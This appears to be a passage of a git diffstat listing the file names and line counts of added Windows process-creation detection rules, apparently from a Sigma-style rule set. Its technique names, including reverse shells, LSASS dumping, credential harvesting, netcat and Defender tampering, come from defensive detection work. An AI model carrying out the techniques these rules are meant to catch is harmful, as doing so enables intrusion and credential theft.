...oc_creation_win_lolscript_register_app.yml | 35 + .../proc_creation_win_lsass_process_clone.yml | 31 + ..._creation_win_malware_conti_shadowcopy.yml | 37 + ...oc_creation_win_malware_script_dropper.yml | 44 + ...roc_creation_win_mftrace_child_process.yml | 27 + ...reation_win_mmc_mmc20_lateral_movement.yml | 30 + ...oc_creation_win_mmc_susp_child_process.yml | 41 + .../proc_creation_win_mofcomp_execution.yml | 56 + ...ion_win_mpcmdrun_dll_sideload_defender.yml | 39 + ...n_win_mpcmdrun_download_arbitrary_file.yml | 37 + ...run_remove_windows_defender_definition.yml | 38 + ...eation_win_msbuild_susp_parent_process.yml | 35 + ...n_win_msdt_arbitrary_command_execution.yml | 38 + ...roc_creation_win_msdt_susp_cab_options.yml | 38 + .../proc_creation_win_msdt_susp_parent.yml | 44 + ...roc_creation_win_msedge_proxy_download.yml | 32 + .../proc_creation_win_mshta_http.yml | 34 + ...roc_creation_win_mshta_inline_vbscript.yml | 31 + .../proc_creation_win_mshta_javascript.yml | 31 + ...creation_win_mshta_lethalhta_technique.yml | 28 + ...reation_win_mshta_susp_child_processes.yml | 53 + ...proc_creation_win_mshta_susp_execution.yml | 46 + .../proc_creation_win_mshta_susp_pattern.yml | 59 + .../proc_creation_win_msiexec_dll.yml | 36 + .../proc_creation_win_msiexec_embedding.yml | 41 + .../proc_creation_win_msiexec_execute_dll.yml | 48 + ...roc_creation_win_msiexec_install_quiet.yml | 57 + ...oc_creation_win_msiexec_install_remote.yml | 50 + ...proc_creation_win_msiexec_masquerading.yml | 33 + .../proc_creation_win_msiexec_web_install.yml | 34 + .../proc_creation_win_msohtmed_download.yml | 34 + .../proc_creation_win_mspub_download.yml | 34 + ...oc_creation_win_msra_process_injection.yml | 38 + ...reation_win_mssql_sqlps_susp_execution.yml | 38 + ...on_win_mssql_sqltoolsps_susp_execution.yml | 36 + ..._creation_win_mssql_susp_child_process.yml | 50 + ...n_win_mssql_veaam_susp_child_processes.yml | 57 + ...reation_win_mstsc_rdp_hijack_shadowing.yml | 30 + 
...c_creation_win_mstsc_remote_connection.yml | 37 + ..._creation_win_mstsc_run_local_rdp_file.yml | 36 + ...mstsc_run_local_rdp_file_susp_location.yml | 44 + ...n_mstsc_run_local_rpd_file_susp_parent.yml | 44 + .../proc_creation_win_msxsl_execution.yml | 31 + ...oc_creation_win_msxsl_remote_execution.yml | 28 + ..._win_net_default_accounts_manipulation.yml | 73 + ...tion_win_net_groups_and_accounts_recon.yml | 66 + ..._win_net_network_connections_discovery.yml | 39 + ...eation_win_net_share_and_sessions_enum.yml | 41 + .../proc_creation_win_net_share_unmount.yml | 36 + .../proc_creation_win_net_start_service.yml | 34 + .../proc_creation_win_net_stop_service.yml | 34 + .../proc_creation_win_net_susp_execution.yml | 62 + ...creation_win_net_use_mount_admin_share.yml | 39 + ...ation_win_net_use_mount_internet_share.yml | 36 + .../proc_creation_win_net_use_mount_share.yml | 39 + ...reation_win_net_use_password_plaintext.yml | 44 + .../proc_creation_win_net_user_add.yml | 45 + ...creation_win_net_user_add_never_expire.yml | 40 + .../proc_creation_win_netsh_fw_add_rule.yml | 38 + ...etsh_fw_allow_program_in_susp_location.yml | 66 + .../proc_creation_win_netsh_fw_allow_rdp.yml | 40 + ...proc_creation_win_netsh_fw_delete_rule.yml | 36 + .../proc_creation_win_netsh_fw_disable.yml | 45 + ...reation_win_netsh_fw_enable_group_rule.yml | 38 + ..._creation_win_netsh_fw_rules_discovery.yml | 39 + .../proc_creation_win_netsh_fw_set_rule.yml | 33 + ...ation_win_netsh_helper_dll_persistence.yml | 42 + ...proc_creation_win_netsh_packet_capture.yml | 34 + ...roc_creation_win_netsh_port_forwarding.yml | 51 + ...reation_win_netsh_port_forwarding_3389.yml | 36 + ...n_win_netsh_wifi_credential_harvesting.yml | 36 + .../proc_creation_win_nltest_execution.yml | 34 + .../proc_creation_win_nltest_recon.yml | 56 + .../proc_creation_win_node_abuse.yml | 40 + ...on_win_node_adobe_creative_cloud_abuse.yml | 33 + ...creation_win_nslookup_domain_discovery.yml | 30 + 
...eation_win_nslookup_poweshell_download.yml | 39 + .../proc_creation_win_ntdsutil_susp_usage.yml | 43 + .../proc_creation_win_ntdsutil_usage.yml | 27 + ...c_creation_win_odbcconf_driver_install.yml | 37 + ...ation_win_odbcconf_driver_install_susp.yml | 37 + ...ation_win_odbcconf_exec_susp_locations.yml | 55 + ...ation_win_odbcconf_register_dll_regsvr.yml | 40 + ..._win_odbcconf_register_dll_regsvr_susp.yml | 37 + ...oc_creation_win_odbcconf_response_file.yml | 41 + ...eation_win_odbcconf_response_file_susp.yml | 46 + ...on_win_odbcconf_uncommon_child_process.yml | 29 + ...tion_win_office_arbitrary_cli_download.yml | 44 + ...win_office_excel_dcom_lateral_movement.yml | 38 + ...win_office_exec_from_trusted_locations.yml | 55 + ...in_office_onenote_susp_child_processes.yml | 130 + ...utlook_enable_unsafe_client_mail_rules.yml | 33 + ...win_office_outlook_execution_from_temp.yml | 28 + ...in_office_outlook_susp_child_processes.yml | 71 + ...ce_outlook_susp_child_processes_remote.yml | 34 + ..._office_spawn_exe_from_users_directory.yml | 45 + ...eation_win_office_susp_child_processes.yml | 140 + ...c_creation_win_office_winword_dll_load.yml | 35 + ...flinescannershell_mpclient_sideloading.yml | 36 + .../proc_creation_win_pdqdeploy_execution.yml | 35 + ...ion_win_pdqdeploy_runner_susp_children.yml | 60 + ...tion_win_perl_inline_command_execution.yml | 30 + ...ation_win_php_inline_command_execution.yml | 31 + .../proc_creation_win_ping_hex_ip.yml | 32 + .../proc_creation_win_pktmon_execution.yml | 28 + ...roc_creation_win_plink_port_forwarding.yml | 31 + ...proc_creation_win_plink_susp_tunneling.yml | 38 + .../proc_creation_win_powercfg_execution.yml | 39 + ...ershell_aadinternals_cmdlets_execution.yml | 62 + ...ell_active_directory_module_dll_import.yml | 45 + ..._win_powershell_add_windows_capability.yml | 39 + ...win_powershell_amsi_init_failed_bypass.yml | 38 + ...n_win_powershell_amsi_null_bits_bypass.yml | 32 + ..._creation_win_powershell_audio_capture.yml | 34 + 
...tion_win_powershell_base64_encoded_cmd.yml | 49 + ...win_powershell_base64_frombase64string.yml | 34 + ...roc_creation_win_powershell_base64_iex.yml | 51 + ..._creation_win_powershell_base64_invoke.yml | 50 + ...ion_win_powershell_base64_mppreference.yml | 47 + ...rshell_base64_reflection_assembly_load.yml | 52 + ...base64_reflection_assembly_load_obfusc.yml | 60 + ...tion_win_powershell_base64_wmi_classes.yml | 81 + ..._creation_win_powershell_cl_invocation.yml | 29 + ...reation_win_powershell_cl_loadassembly.yml | 31 + ...ation_win_powershell_cl_mutexverifiers.yml | 37 + ...ershell_cmdline_convertto_securestring.yml | 37 + ...in_powershell_cmdline_reversed_strings.yml | 69 + ..._powershell_cmdline_special_characters.yml | 47 + ...hell_computer_discovery_get_adcomputer.yml | 47 + ...creation_win_powershell_create_service.yml | 33 + ...oc_creation_win_powershell_decode_gzip.yml | 28 + ...reation_win_powershell_decrypt_pattern.yml | 55 + ...in_powershell_defender_disable_feature.yml | 91 + ...tion_win_powershell_defender_exclusion.yml | 41 + ...isable_defender_av_security_monitoring.yml | 54 + ...eation_win_powershell_disable_firewall.yml | 47 + ...ion_win_powershell_disable_ie_features.yml | 37 + ..._creation_win_powershell_dll_execution.yml | 45 + ...eation_win_powershell_downgrade_attack.yml | 40 + ...on_win_powershell_download_com_cradles.yml | 42 + ...eation_win_powershell_download_cradles.yml | 33 + ...c_creation_win_powershell_download_dll.yml | 34 + ...c_creation_win_powershell_download_iex.yml | 44 + ...ation_win_powershell_download_patterns.yml | 44 + ...oc_creation_win_powershell_email_exfil.yml | 35 + ...l_enable_susp_windows_optional_feature.yml | 44 + .../proc_creation_win_powershell_encode.yml | 43 + ...on_win_powershell_encoded_cmd_patterns.yml | 51 + ...creation_win_powershell_encoded_obfusc.yml | 58 + ...ation_win_powershell_encoding_patterns.yml | 58 + ...creation_win_powershell_exec_data_file.yml | 37 + 
...tion_win_powershell_export_certificate.yml | 35 + ...eation_win_powershell_frombase64string.yml | 29 + ...in_powershell_frombase64string_archive.yml | 32 + ..._creation_win_powershell_get_clipboard.yml | 31 + ...powershell_get_localgroup_member_recon.yml | 44 + ...eation_win_powershell_getprocess_lsass.yml | 31 + ...creation_win_powershell_hidden_b64_cmd.yml | 84 + ...wershell_hide_services_via_set_service.yml | 44 + ...c_creation_win_powershell_iex_patterns.yml | 47 + ..._powershell_import_cert_susp_locations.yml | 38 + ...win_powershell_import_module_susp_dirs.yml | 44 + ...ershell_install_unsigned_appx_packages.yml | 41 + ...ion_win_powershell_invocation_specific.yml | 76 + ...powershell_invoke_webrequest_direct_ip.yml | 50 + ..._powershell_invoke_webrequest_download.yml | 57 + ...ion_win_powershell_mailboxexport_share.yml | 35 + ...ation_win_powershell_malicious_cmdlets.yml | 248 + ..._powershell_msexchange_transport_agent.yml | 32 + ...n_powershell_non_interactive_execution.yml | 47 + ...on_win_powershell_obfuscation_via_utf8.yml | 29 + ..._creation_win_powershell_public_folder.yml | 44 + ...wershell_remotefxvgpudisablement_abuse.yml | 37 + ...in_powershell_reverse_shell_connection.yml | 39 + ...ion_win_powershell_run_script_from_ads.yml | 35 + ...owershell_run_script_from_input_stream.yml | 32 + ...roc_creation_win_powershell_sam_access.yml | 37 + ...on_win_powershell_script_engine_parent.yml | 35 + ..._service_dacl_modification_set_service.yml | 45 + .../proc_creation_win_powershell_set_acl.yml | 43 + ...n_win_powershell_set_acl_susp_location.yml | 54 + ...ershell_set_policies_to_unsecure_level.yml | 51 + ...on_win_powershell_set_service_disabled.yml | 35 + ...ion_win_powershell_shadowcopy_deletion.yml | 46 + ...reation_win_powershell_snapins_hafnium.yml | 46 + ...c_creation_win_powershell_stop_service.yml | 34 + ...on_win_powershell_susp_child_processes.yml | 49 + ..._win_powershell_susp_download_patterns.yml | 37 + 
...in_powershell_susp_parameter_variation.yml | 138 + ...ion_win_powershell_susp_parent_process.yml | 66 + ...reation_win_powershell_susp_ps_appdata.yml | 39 + ...on_win_powershell_susp_ps_downloadfile.yml | 33 + ...ll_tamper_defender_remove_mppreference.yml | 35 + ...ation_win_powershell_token_obfuscation.yml | 38 + ...n_powershell_user_discovery_get_aduser.yml | 46 + ...eation_win_powershell_webclient_casing.yml | 179 + ...creation_win_powershell_x509enrollment.yml | 33 + ...reation_win_powershell_xor_commandline.yml | 56 + ...c_creation_win_powershell_zip_compress.yml | 40 + ...creation_win_presentationhost_download.yml | 34 + ...resentationhost_uncommon_location_exec.yml | 36 + ...ation_win_pressanykey_lolbin_execution.yml | 32 + ...oc_creation_win_print_remote_file_copy.yml | 34 + ..._creation_win_protocolhandler_download.yml | 35 + ...reation_win_provlaunch_potential_abuse.yml | 55 + ...tion_win_provlaunch_susp_child_process.yml | 54 + ...c_creation_win_psr_capture_screenshots.yml | 32 + ...proc_creation_win_pua_3proxy_execution.yml | 32 + ...oc_creation_win_pua_adfind_enumeration.yml | 44 + ...roc_creation_win_pua_adfind_susp_usage.yml | 61 + ...c_creation_win_pua_advanced_ip_scanner.yml | 39 + ...creation_win_pua_advanced_port_scanner.yml | 35 + .../proc_creation_win_pua_advancedrun.yml | 44 + ...creation_win_pua_advancedrun_priv_user.yml | 47 + .../proc_creation_win_pua_chisel.yml | 44 + .../proc_creation_win_pua_cleanwipe.yml | 38 + .../proc_creation_win_pua_crassus.yml | 28 + .../proc_creation_win_pua_csexec.yml | 32 + .../proc_creation_win_pua_defendercheck.yml | 28 + .../proc_creation_win_pua_ditsnap.yml | 29 + .../proc_creation_win_pua_frp.yml | 41 + .../proc_creation_win_pua_iox.yml | 42 + ...c_creation_win_pua_mouselock_execution.yml | 35 + .../proc_creation_win_pua_netcat.yml | 46 + .../proc_creation_win_pua_ngrok.yml | 57 + .../proc_creation_win_pua_nimgrab.yml | 36 + .../proc_creation_win_pua_nircmd.yml | 48 + 
...proc_creation_win_pua_nircmd_as_system.yml | 33 + .../proc_creation_win_pua_nmap_zenmap.yml | 33 + .../proc_creation_win_pua_nps.yml | 43 + .../proc_creation_win_pua_nsudo.yml | 53 + .../proc_creation_win_pua_pingcastle.yml | 190 + ...ation_win_pua_pingcastle_script_parent.yml | 95 + .../proc_creation_win_pua_process_hacker.yml | 68 + .../proc_creation_win_pua_radmin.yml | 31 + ...proc_creation_win_pua_rcedit_execution.yml | 46 + ...proc_creation_win_pua_rclone_execution.yml | 64 + .../proc_creation_win_pua_runxcmd.yml | 36 + .../proc_creation_win_pua_seatbelt.yml | 61 + .../proc_creation_win_pua_system_informer.yml | 50 + ...oc_creation_win_pua_webbrowserpassview.yml | 28 + ..._creation_win_pua_wsudo_susp_execution.yml | 38 + .../proc_creation_win_python_adidnsdump.yml | 30 + ...on_win_python_inline_command_execution.yml | 41 + .../proc_creation_win_python_pty_spawn.yml | 38 + .../proc_creation_win_query_session_exfil.yml | 29 + .../proc_creation_win_rar_compress_data.yml | 29 + ...tion_win_rar_compression_with_password.yml | 34 + ...eation_win_rar_susp_greedy_compression.yml | 47 + .../proc_creation_win_rasdial_execution.yml | 28 + ...eation_win_rdrleakdiag_process_dumping.yml | 47 + .../proc_creation_win_reg_add_run_key.yml | 33 + .../proc_creation_win_reg_add_safeboot.yml | 36 + .../proc_creation_win_reg_bitlocker.yml | 41 + ..._credential_access_via_password_filter.yml | 31 + ...oc_creation_win_reg_defender_exclusion.yml | 38 + .../proc_creation_win_reg_delete_safeboot.yml | 35 + .../proc_creation_win_reg_delete_services.yml | 33 + ...tion_win_reg_desktop_background_change.yml | 59 + ...direct_asep_registry_keys_modification.yml | 41 + ..._creation_win_reg_disable_sec_services.yml | 50 + ...eation_win_reg_dumping_sensitive_hives.yml | 64 + ...numeration_for_credentials_in_registry.yml | 43 + ...n_win_reg_import_from_suspicious_paths.yml | 42 + ...n_win_reg_lsa_disable_restricted_admin.yml | 36 + ...on_win_reg_lsa_ppl_protection_disabled.yml | 34 + 
.../proc_creation_win_reg_machineguid.yml | 30 + ...n_win_reg_modify_group_policy_settings.yml | 41 + .../proc_creation_win_reg_nolmhash.yml | 37 + .../proc_creation_win_reg_open_command.yml | 44 + .../proc_creation_win_reg_query_registry.yml | 39 + .../proc_creation_win_reg_rdp_keys_tamper.yml | 53 + .../proc_creation_win_reg_screensaver.yml | 58 + ...ation_win_reg_service_imagepath_change.yml | 38 + ...oc_creation_win_reg_software_discovery.yml | 36 + .../proc_creation_win_reg_susp_paths.yml | 40 + .../proc_creation_win_reg_volsnap_disable.yml | 29 + ...eation_win_reg_windows_defender_tamper.yml | 70 + ...reg_write_protect_for_storage_disabled.yml | 31 + ...m_regsvcs_uncommon_extension_execution.yml | 45 + ...sm_regsvcs_uncommon_location_execution.yml | 47 + ...ation_win_regedit_export_critical_keys.yml | 48 + .../proc_creation_win_regedit_export_keys.yml | 48 + .../proc_creation_win_regedit_import_keys.yml | 51 + ...c_creation_win_regedit_import_keys_ads.yml | 48 + ..._creation_win_regedit_trustedinstaller.yml | 30 + .../proc_creation_win_regini_ads.yml | 38 + .../proc_creation_win_regini_execution.yml | 38 + ...tion_win_registry_cimprovider_dll_load.yml | 33 + ...gistry_enumeration_for_credentials_cli.yml | 49 + ...urity_zone_protocol_defaults_downgrade.yml | 36 + ...registry_install_reg_debugger_backdoor.yml | 39 + ...roc_creation_win_registry_logon_script.yml | 30 + ...tion_win_registry_new_network_provider.yml | 39 + ...y_privilege_escalation_via_service_key.yml | 35 + ...gistry_provlaunch_provisioning_command.yml | 34 + ...egistry_set_unsecure_powershell_policy.yml | 39 + ...n_win_registry_typed_paths_persistence.yml | 26 + ...oc_creation_win_regsvr32_flags_anomaly.yml | 34 + ..._creation_win_regsvr32_http_ip_pattern.yml | 68 + ..._creation_win_regsvr32_network_pattern.yml | 41 + ...roc_creation_win_regsvr32_remote_share.yml | 30 + ...eation_win_regsvr32_susp_child_process.yml | 50 + ...creation_win_regsvr32_susp_exec_path_1.yml | 39 + 
...creation_win_regsvr32_susp_exec_path_2.yml | 68 + ..._creation_win_regsvr32_susp_extensions.yml | 57 + ...proc_creation_win_regsvr32_susp_parent.yml | 42 + ...eation_win_regsvr32_uncommon_extension.yml | 44 + ...win_remote_access_software_ultraviewer.yml | 31 + ...eation_win_remote_access_tools_anydesk.yml | 36 + ...s_tools_anydesk_piped_password_via_cli.yml | 32 + ...te_access_tools_anydesk_silent_install.yml | 35 + ..._remote_access_tools_anydesk_susp_exec.yml | 41 + ...ion_win_remote_access_tools_gotoopener.yml | 32 + ...eation_win_remote_access_tools_logmein.yml | 32 + ...ion_win_remote_access_tools_netsupport.yml | 33 + ...mote_access_tools_netsupport_susp_exec.yml | 34 + ...ccess_tools_rurat_non_default_location.yml | 33 + ..._win_remote_access_tools_screenconnect.yml | 32 + ...mote_access_tools_screenconnect_access.yml | 32 + ...ote_access_tools_screenconnect_anomaly.yml | 32 + ...access_tools_screenconnect_remote_exec.yml | 33 + ...roc_creation_win_remote_time_discovery.yml | 34 + .../proc_creation_win_renamed_adfind.yml | 65 + .../proc_creation_win_renamed_autohotkey.yml | 44 + .../proc_creation_win_renamed_autoit.yml | 53 + .../proc_creation_win_renamed_binary.yml | 52 + ...ion_win_renamed_binary_highly_relevant.yml | 85 + .../proc_creation_win_renamed_browsercore.yml | 29 + .../proc_creation_win_renamed_cloudflared.yml | 93 + .../proc_creation_win_renamed_createdump.yml | 43 + .../proc_creation_win_renamed_curl.yml | 32 + .../proc_creation_win_renamed_dctask64.yml | 38 + .../proc_creation_win_renamed_ftp.yml | 34 + .../proc_creation_win_renamed_gpg4win.yml | 28 + .../proc_creation_win_renamed_jusched.yml | 32 + .../proc_creation_win_renamed_mavinject.yml | 42 + .../proc_creation_win_renamed_megasync.yml | 30 + .../proc_creation_win_renamed_msdt.yml | 29 + ...oc_creation_win_renamed_netsupport_rat.yml | 31 + ..._creation_win_renamed_office_processes.yml | 54 + .../proc_creation_win_renamed_paexec.yml | 48 + .../proc_creation_win_renamed_pingcastle.yml 
| 61 + .../proc_creation_win_renamed_plink.yml | 34 + .../proc_creation_win_renamed_pressanykey.yml | 33 + ...win_renamed_rundll32_dllregisterserver.yml | 32 + .../proc_creation_win_renamed_rurat.yml | 34 + ...ion_win_renamed_sysinternals_debugview.yml | 30 + ...tion_win_renamed_sysinternals_procdump.yml | 43 + ...in_renamed_sysinternals_psexec_service.yml | 28 + ...ation_win_renamed_sysinternals_sdelete.yml | 37 + .../proc_creation_win_renamed_vmnat.yml | 29 + .../proc_creation_win_renamed_whoami.yml | 31 + ...reation_win_rpcping_credential_capture.yml | 47 + ...tion_win_ruby_inline_command_execution.yml | 30 + ..._win_rundll32_ads_stored_dll_execution.yml | 33 + ...ndll32_advpack_obfuscated_ordinal_call.yml | 35 + .../proc_creation_win_rundll32_by_ordinal.yml | 52 + .../proc_creation_win_rundll32_inline_vbs.yml | 31 + ...eation_win_rundll32_installscreensaver.yml | 31 + ...ion_win_rundll32_js_runhtmlapplication.yml | 30 + .../proc_creation_win_rundll32_keymgr.yml | 32 + ...win_rundll32_mshtml_runhtmlapplication.yml | 31 + .../proc_creation_win_rundll32_no_params.yml | 35 + .../proc_creation_win_rundll32_ntlmrelay.yml | 38 + ...n_win_rundll32_obfuscated_ordinal_call.yml | 31 + ..._creation_win_rundll32_parent_explorer.yml | 33 + ..._win_rundll32_process_dump_via_comsvcs.yml | 60 + ...on_win_rundll32_registered_com_objects.yml | 37 + ...oc_creation_win_rundll32_run_locations.yml | 39 + .../proc_creation_win_rundll32_script_run.yml | 36 + ...n_rundll32_setupapi_installhinfsection.yml | 39 + ...on_win_rundll32_shell32_susp_execution.yml | 41 + ...rundll32_shelldispatch_potential_abuse.yml | 29 + ...c_creation_win_rundll32_spawn_explorer.yml | 30 + ...oc_creation_win_rundll32_susp_activity.yml | 112 + ...ion_win_rundll32_susp_control_dll_load.yml | 36 + ...32_susp_execution_with_image_extension.yml | 46 + ..._win_rundll32_susp_shellexec_execution.yml | 43 + ...tion_win_rundll32_susp_shimcache_flush.yml | 44 + .../proc_creation_win_rundll32_sys.yml | 31 + 
.../proc_creation_win_rundll32_unc_path.yml | 32 + ...on_win_rundll32_uncommon_dll_extension.yml | 44 + .../proc_creation_win_rundll32_user32_dll.yml | 36 + ...n_win_rundll32_webdav_client_execution.yml | 35 + ..._rundll32_webdav_client_susp_execution.yml | 59 + ...eation_win_rundll32_without_parameters.yml | 38 + .../proc_creation_win_runonce_execution.yml | 33 + ..._change_sevice_image_path_by_non_admin.yml | 39 + .../proc_creation_win_sc_create_service.yml | 34 + .../proc_creation_win_sc_disable_service.yml | 36 + ...proc_creation_win_sc_new_kernel_driver.yml | 35 + .../proc_creation_win_sc_query.yml | 31 + ...ion_win_sc_sdset_allow_service_changes.yml | 43 + ...ation_win_sc_sdset_deny_service_access.yml | 46 + ...roc_creation_win_sc_sdset_hide_sevices.yml | 48 + ...roc_creation_win_sc_sdset_modification.yml | 40 + ...ation_win_sc_service_path_modification.yml | 58 + ..._win_sc_service_tamper_for_persistence.yml | 60 + .../proc_creation_win_sc_stop_service.yml | 37 + ...tion_win_schtasks_appdata_local_system.yml | 45 + .../proc_creation_win_schtasks_change.yml | 77 + .../proc_creation_win_schtasks_creation.yml | 39 + ...tion_win_schtasks_creation_temp_folder.yml | 36 + .../proc_creation_win_schtasks_delete.yml | 43 + .../proc_creation_win_schtasks_delete_all.yml | 30 + .../proc_creation_win_schtasks_disable.yml | 45 + .../proc_creation_win_schtasks_env_folder.yml | 78 + ...oc_creation_win_schtasks_folder_combos.yml | 44 + ...c_creation_win_schtasks_guid_task_name.yml | 40 + ...n_schtasks_one_time_only_midnight_task.yml | 44 + .../proc_creation_win_schtasks_parent.yml | 37 + ...schtasks_persistence_windows_telemetry.yml | 37 + ...on_win_schtasks_powershell_persistence.yml | 40 + .../proc_creation_win_schtasks_reg_loader.yml | 49 + ...eation_win_schtasks_reg_loader_encoded.yml | 47 + ...oc_creation_win_schtasks_schedule_type.yml | 43 + ...tion_win_schtasks_schedule_type_system.yml | 42 + ...asks_schedule_via_masqueraded_xml_file.yml | 55 + 
...roc_creation_win_schtasks_susp_pattern.yml | 68 + .../proc_creation_win_schtasks_system.yml | 53 + ...reation_win_scrcons_susp_child_process.yml | 44 + ..._creation_win_sdbinst_shim_persistence.yml | 42 + ...oc_creation_win_sdbinst_susp_extension.yml | 49 + .../proc_creation_win_sdclt_child_process.yml | 28 + ...roc_creation_win_sdiagnhost_susp_child.yml | 44 + .../proc_creation_win_secedit_execution.yml | 56 + ..._creation_win_servu_susp_child_process.yml | 44 + ...oc_creation_win_setspn_spn_enumeration.yml | 36 + .../proc_creation_win_shutdown_execution.yml | 30 + .../proc_creation_win_shutdown_logoff.yml | 28 + ...eation_win_sndvol_susp_child_processes.yml | 28 + ...eation_win_soundrecorder_audio_capture.yml | 29 + ...proc_creation_win_splwow64_cli_anomaly.yml | 28 + ...ation_win_spoolsv_susp_child_processes.yml | 88 + ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 38 + .../proc_creation_win_sqlcmd_veeam_dump.yml | 33 + ...ation_win_sqlite_chromium_profile_data.yml | 46 + ..._win_sqlite_firefox_gecko_profile_data.yml | 37 + .../proc_creation_win_squirrel_download.yml | 45 + ..._creation_win_squirrel_proxy_execution.yml | 73 + .../proc_creation_win_ssh_port_forward.yml | 33 + .../proc_creation_win_ssh_rdp_tunneling.yml | 31 + .../proc_creation_win_ssm_agent_abuse.yml | 34 + ...eation_win_stordiag_susp_child_process.yml | 36 + ...oc_creation_win_susp_16bit_application.yml | 31 + ...ation_win_susp_abusing_debug_privilege.yml | 56 + ...on_win_susp_add_user_local_admin_group.yml | 41 + ...win_susp_add_user_remote_desktop_group.yml | 46 + ...eation_win_susp_alternate_data_streams.yml | 49 + ...ays_install_elevated_windows_installer.yml | 56 + .../proc_creation_win_susp_appx_execution.yml | 53 + ...ary_shell_execution_via_settingcontent.yml | 35 + ...reation_win_susp_archiver_iso_phishing.yml | 34 + ...creation_win_susp_automated_collection.yml | 49 + ...n_susp_bad_opsec_sacrificial_processes.yml | 65 + ...tion_win_susp_child_process_as_system_.yml | 47 + 
...n_win_susp_cli_obfuscation_escape_char.yml | 34 + ...ation_win_susp_cli_obfuscation_unicode.yml | 53 + ...usp_commandline_path_traversal_evasion.yml | 39 + ...oc_creation_win_susp_copy_browser_data.yml | 74 + ...reation_win_susp_copy_lateral_movement.yml | 65 + ...proc_creation_win_susp_copy_system_dir.yml | 58 + ...eation_win_susp_copy_system_dir_lolbin.yml | 65 + ...creation_win_susp_crypto_mining_monero.yml | 51 + ...ion_win_susp_data_exfiltration_via_cli.yml | 72 + ...proc_creation_win_susp_disable_raccine.yml | 39 + ...roc_creation_win_susp_double_extension.yml | 72 + ...ation_win_susp_double_extension_parent.yml | 68 + ...eation_win_susp_download_office_domain.yml | 43 + ...reation_win_susp_dumpstack_log_evasion.yml | 28 + ...on_win_susp_elavated_msi_spawned_shell.yml | 42 + ...reation_win_susp_electron_app_children.yml | 108 + ...tion_win_susp_electron_exeuction_proxy.yml | 66 + ..._elevated_system_shell_uncommon_parent.yml | 74 + .../proc_creation_win_susp_embed_exe_lnk.yml | 30 + ...tion_win_susp_etw_modification_cmdline.yml | 38 + ...oc_creation_win_susp_etw_trace_evasion.yml | 58 + .../proc_creation_win_susp_eventlog_clear.yml | 64 + ...eation_win_susp_eventlog_content_recon.yml | 85 + ..._susp_execution_from_guid_folder_names.yml | 46 + ...execution_from_public_folder_as_parent.yml | 46 + .../proc_creation_win_susp_execution_path.yml | 57 + ...tion_win_susp_execution_path_webserver.yml | 38 + ...creation_win_susp_file_characteristics.yml | 40 + ...win_susp_gather_network_info_execution.yml | 38 + ...n_win_susp_hidden_dir_index_allocation.yml | 35 + ...in_susp_hiding_malware_in_fonts_folder.yml | 57 + ...win_susp_homoglyph_cyrillic_lookalikes.yml | 82 + .../proc_creation_win_susp_image_missing.yml | 42 + ...ation_win_susp_inline_base64_mz_header.yml | 30 + ...reation_win_susp_inline_win_api_access.yml | 80 + ...p_local_system_owner_account_discovery.yml | 63 + ..._win_susp_lolbin_exec_from_non_c_drive.yml | 57 + 
...eation_win_susp_lsass_dmp_cli_keywords.yml | 54 + ...tion_win_susp_ms_appinstaller_download.yml | 34 + ...proc_creation_win_susp_network_command.yml | 33 + ...oc_creation_win_susp_network_scan_loop.yml | 36 + ...roc_creation_win_susp_network_sniffing.yml | 34 + .../proc_creation_win_susp_non_exe_image.yml | 85 + ...c_creation_win_susp_non_priv_reg_or_ps.yml | 48 + .../proc_creation_win_susp_ntds.yml | 77 + ...creation_win_susp_nteventlogfile_usage.yml | 39 + ..._win_susp_ntfs_short_name_path_use_cli.yml | 50 + ...in_susp_ntfs_short_name_path_use_image.yml | 51 + ...ation_win_susp_ntfs_short_name_use_cli.yml | 55 + ...ion_win_susp_ntfs_short_name_use_image.yml | 62 + ...eation_win_susp_obfuscated_ip_download.yml | 59 + ...reation_win_susp_obfuscated_ip_via_cli.yml | 54 + ..._creation_win_susp_office_token_search.yml | 30 + .../proc_creation_win_susp_parents.yml | 49 + ...in_susp_priv_escalation_via_named_pipe.yml | 40 + ...c_creation_win_susp_private_keys_recon.yml | 54 + ...susp_privilege_escalation_cli_patterns.yml | 43 + ...oc_creation_win_susp_proc_wrong_parent.yml | 54 + .../proc_creation_win_susp_progname.yml | 74 + .../proc_creation_win_susp_recon.yml | 42 + ...on_win_susp_recycle_bin_fake_execution.yml | 34 + ...on_win_susp_redirect_local_admin_share.yml | 32 + ...tion_win_susp_remote_desktop_tunneling.yml | 33 + ...eation_win_susp_right_to_left_override.yml | 30 + ...n_win_susp_script_exec_from_env_folder.yml | 63 + ...reation_win_susp_script_exec_from_temp.yml | 47 + ...roc_creation_win_susp_service_creation.yml | 60 + .../proc_creation_win_susp_service_dir.yml | 41 + .../proc_creation_win_susp_service_tamper.yml | 245 + ...eation_win_susp_shadow_copies_creation.yml | 43 + ...eation_win_susp_shadow_copies_deletion.yml | 74 + ...tion_win_susp_shell_spawn_susp_program.yml | 75 + .../proc_creation_win_susp_sysnative.yml | 29 + ...c_creation_win_susp_system_exe_anomaly.yml | 97 + ..._creation_win_susp_system_user_anomaly.yml | 103 + 
.../proc_creation_win_susp_sysvol_access.yml | 30 + ..._creation_win_susp_task_folder_evasion.yml | 44 + .../proc_creation_win_susp_use_of_te_bin.yml | 32 + ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 36 + .../proc_creation_win_susp_userinit_child.yml | 35 + ...tion_win_susp_weak_or_abused_passwords.yml | 36 + ...n_win_susp_web_request_cmd_and_cmdlets.yml | 46 + ...proc_creation_win_susp_whoami_as_param.yml | 28 + .../proc_creation_win_susp_workfolders.yml | 30 + ...in_svchost_execution_with_no_cli_flags.yml | 37 + ...eation_win_svchost_termserv_proc_spawn.yml | 40 + ...on_win_svchost_uncommon_parent_process.yml | 39 + ...sinternals_accesschk_check_permissions.yml | 46 + ..._win_sysinternals_adexplorer_execution.yml | 33 + ...sysinternals_adexplorer_susp_execution.yml | 40 + ...reation_win_sysinternals_eula_accepted.yml | 33 + ...tion_win_sysinternals_livekd_execution.yml | 28 + ...sysinternals_livekd_kernel_memory_dump.yml | 34 + ...roc_creation_win_sysinternals_procdump.yml | 30 + ...tion_win_sysinternals_procdump_evasion.yml | 42 + ...eation_win_sysinternals_procdump_lsass.yml | 37 + ...tion_win_sysinternals_psexec_execution.yml | 29 + ...nternals_psexec_paexec_escalate_system.yml | 74 + ...n_sysinternals_psexec_remote_execution.yml | 33 + ...roc_creation_win_sysinternals_psexesvc.yml | 31 + ...on_win_sysinternals_psexesvc_as_system.yml | 32 + ...oc_creation_win_sysinternals_psloglist.yml | 53 